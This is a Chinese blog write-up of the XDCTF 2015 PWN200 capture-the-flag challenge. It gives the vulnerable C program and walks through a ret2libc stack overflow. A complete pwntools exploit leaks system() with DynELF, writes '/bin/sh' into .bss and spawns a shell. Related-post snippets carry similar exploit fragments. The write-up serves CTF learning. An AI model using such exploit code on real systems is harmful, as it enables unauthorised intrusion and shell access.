XDCTF2015 PWN200

最新推荐文章于 2022-12-23 12:29:18 发布
最新推荐文章于 2022-12-23 12:29:18 发布
阅读量1.7k 收藏 1
点赞数 1
分类专栏: PWN 文章标签: XDCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33528164/article/details/79408415
版权

XDCTF 2015 PWN200

一. 源码(自己敲出来的)

#include <stdio.h>
#include <unistd.h>
#include <string.h>

int vuln(){
    char buf[80];
    setbuf(stdin, buf);
    return read(0, buf, 256);
}

int main(int argc, char** argv){
    char* welcome = "Welcome to XDCTF2015 ~!\n";
    setbuf(stdout, welcome);
    write(1, welcome, strlen(welcome));
    vuln();
    return 0;
}

检查一下保护:
result
结论: 只有NX保护, so我们不能往shellcode方向思考了,要向system("/bin/sh")

二. 分析

思路: 泄露system函数地址,发送/bin/sh, 执行。
问题一: 如何泄露system地址?

答: 使用pwntools模块DynELF

from pwn import *

p = process('./pwn200')
elf = ELF('./pwn200')
write = elf.plt['write']
read  = elf.plt['read']
bss = elf.bss(0x2C)
main = 0x80484be
pppt = 0x0804856c
offset = 112

def leak(address):
  #各种预处理
  payload = "A" * 112 + p32(write) + p32(main) + p32(1) + p32(address) + p32(4)
  p.send(payload)
  #各种处理
  data = p.recv(4)
  log.debug("%#x => %s" % (address, (data or '').encode('hex')))
  return data
d = DynELF(leak, elf = elf)      #初始化DynELF模块 
systemAddress = d.lookup('system', 'libc')  #在libc文件中搜索system函数的地址

问题二: 如何发送/bin/sh?

构造类似的payload

payload = 'A' * 112 + p32(read) + p32(pppt) + p32(0) + p32(bss) + p32(0x2C) + p32(systemAddress) + p32(main) + p32(bss)

问题三: pppt是干什么的?如何获得

pppt是为了弹出read的三个参数,执行后面的system函数.
result

EXP

from pwn import *

p = process('./pwn200')
elf = ELF('./pwn200')
write = elf.plt['write']
read  = elf.plt['read']
bss = elf.bss(0x2C)
main = 0x80484be
pppt = 0x0804856c
offset = 112

def leak(address):
    p.recvuntil('Welcome to XDCTF2015~!\n')
    payload = "A" * 112 + p32(write) + p32(main) + p32(1) + p32(address) + p32(4)
    p.send(payload)
    data = p.recv(4)
    log.debug("%#x => %s" % (address, (data or '').encode('hex')))
    return data
d = DynELF(leak, elf = elf)
systemAddress = d.lookup('system', 'libc')
payload = 'A' * 112 + p32(read) + p32(pppt) + p32(0) + p32(bss) + p32(0x2C) + p32(systemAddress) + p32(main) + p32(bss)
p.send(payload)
payload = "/bin/sh\00"
p.send(payload)
p.interactive()
qq_33528164
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
xdctf2015_pwn200
、moddemod
07-18 268
exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './bof' # p = process(proc_name) p = remote('node3.buuoj.cn', 25483) elf = ELF(proc_name) main_addr = elf.sym['main'] write_plt = elf.plt['write'] write_got = elf.go.
探索 XDCTF2015:一个黑客马拉松式的网络安全学习平台
最新发布
gitblog_00088的博客
04-08 291
探索 XDCTF2015:一个黑客马拉松式的网络安全学习平台 项目地址:https://gitcode.com/phith0n/XDCTF2015 项目简介 XDCTF2015 是一个基于 GitCode 平台的开源项目,由 phith0n 创建,旨在为网络安全爱好者提供一种实战型的学习体验。它是一个在线的安全挑战赛框架,模拟了典型的网络安全竞赛(Capture The Flag, CTF)环境,...
[BUUCTF]PWN——xdctf2015_pwn200
mcmuyanga的博客
11-11 1066
xdctf2015_pwn200 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,没有发现什么铭感的地方,直接看main函数 vuln函数 参数buf存在溢出漏洞,由于开启了nx,没有可以直接利用的后门,这边使用ret2libc的方法 利用过程: 先用write函数泄露libc版本 payload='a'*(0x6c+4) #溢出到ret payload+=p32(wri
(攻防世界)(XDCTF-2015)pwn200
PLpa的博客
07-13 2174
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
pwn-200题目文件
02-16
pwn-200题目文件
pwn100题目文件及exp.zip
08-09
在IT安全领域,尤其是逆向工程和漏洞利用中,“pwn”是一个常见的术语,它涵盖了对软件漏洞的利用,特别是那些允许攻击者获得系统控制权的漏洞。本资源中的“pwn100”可能是一个初级级别的CTF(Capture The Flag)...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
BUUCTF xdctf2015_pwn200
qq_51821131的博客
10-05 1609
xdctf2015_pwn200 检查一下保护 拖进ida看看 存在明显栈溢出,但是没有system和binsh 但是可以通过泄露,找到地址,并拿到shell from pwn import * from LibcSearcher import * p=remote('node4.buuoj.cn',26340) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./bof') read_got=elf.got['read'] write_pl
xdctf2015前20名writeup
10-07
2015年xdctf前20名的writeup,绝对不坑
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
XDCTF-2015 pwn-200 backdoorctf-2015 echo
qq_41071646的博客
05-17 654
XDCTF-2015 pwn-200 简单的泄露基址 这里就不多讲了 #!/usr/bin/python2 # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=remote("111.198.29.45",32529) io=process("./pwn") elf=ELF("./pwn") li...
xdctf-pwn200
Vccxx的博客
04-08 1329
XDCTF (哪一年的忘了)中的一道pwn题题目地址http://pan.baidu.com/s/1hszHtwo解题思路:缓冲区溢出->泄露ebp->覆盖got表->执行shellcode首先用ida分析这题的反汇编:这里是一个关键的缓冲区溢出点,这里虽然v2的长度和读入的最大长度一致,但是我们知道对于printf函数,如果后面的地址中(这里是v2的栈地址)的内容没有”/x00”这样的结束符,就会
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 396
做题记录
pwn200,一道不完全考察ret2libc的小小pwn题
shanwei274的博客
04-08 346
pwn200XDCTF-2015 每日一pwn,今天又做了一个pwn,那个pwn呢???攻防世界的进阶区里的一道小pwn题,虽然这个题考察的知识不多,rop链也比较好构建,但是还是让我又学到了一些东西,因为害怕忘记,写个博客记录记录。 1.获取pwn题 啪的一下就下载好了。 2.查看保护 拿到题我不做,哎,我干什么呢,我先查看保护! 裸奔题,开的东西不多,所以这里就看我们发挥了 3.ida看看 首先可以很明显的看到,给的7个变量,在栈中是连续排列的,一开始我还不知道给这里的七个数赋值到底有什么用,我
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1096
buuctf-pwn 047~053题,重点关注第53题的C++ pwn

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值